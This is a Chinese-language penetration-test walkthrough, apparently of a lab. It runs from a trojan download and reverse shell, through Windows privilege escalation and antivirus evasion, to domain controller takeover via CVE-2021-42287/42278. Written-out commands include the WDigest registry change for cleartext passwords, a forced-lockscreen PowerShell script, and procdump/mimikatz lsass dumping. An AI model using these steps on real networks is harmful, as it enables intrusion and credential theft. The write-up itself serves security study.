link位置是base64编码的地址
然后正常访问到下载的木马文件
获取到之后直接就是root权限。在这里尝试了多次正向失败,关闭本地防火墙然后进行反弹shell:
使用监听:
反弹成功:
查看进程,当前机器使用了火绒:
寻找提权的方式,使用systeminfo命令,将结果复制到网站:
最终使用了CVE_2021_1732_win32k这个提权工具,多执行几次就能成功,我也是看作者这样做的:
查看网卡的配置,当前是存在域环境的,然后也存在第二块网卡,添加路由:
使用命令查找域控制器的IP,由于存在火绒,需要谨慎操作,不然session会断掉:
当前进程中,也是存在域用户的,存在域用户就可以使用域提权漏洞获取域控制器的权限:
使用mimikatz的creds_all命令抓取密码 ,但是没有明文密码。使用这个命令并未拦截:
由于是win10系统,微软在windows 2012 之后就打了补丁kb2871997,需要修改注册表抓取密码。第一条是开启,第二条是关闭:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /freg add HKLMS\YSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
修改注册表之后,需要重启或者管理员重新登录才能抓取明文密码,这里可以使用脚本让其锁屏
lock.ps1
Function Lock-WorkStation { $signature = @" [DllImport("user32.dll", SetLastError = true)] public static extern bool LockWorkStation(); "@ $LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null } Lock-WorkStation
这样就抓取到了明文密码:
对域控IP进行端口扫描,开放的88,445,135端口:
2.3 域提权 CVE-2021-42287/CVE-2021-42278
使用py脚本,填写"域/域用户:域密码",成功获取到域控机器的权限:
使用脚本开启3389,使用rdp协议进行连接:
关闭防火墙:
但是在这里连接失败
原因是由于域控机器开启了如下的功能,需要使用相同的机器才能进行远程访问:
上面的exp脚本也可以直接-dump导出当前的hash,我忘记截图了。然后使用将hash进行md5解密,得知密码:Admin@123
既然知道了密码,在win10机器上进行IPC连接,上传正向的后门到域控制器:
成功获取到域控制器的机器
如下就是所有的sessions
2.4 拓展
还可以使用procdump的方式导出lsass.exe,存放在当前文件的lsass.dmp
接着使用mimikatz进行密码读取
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
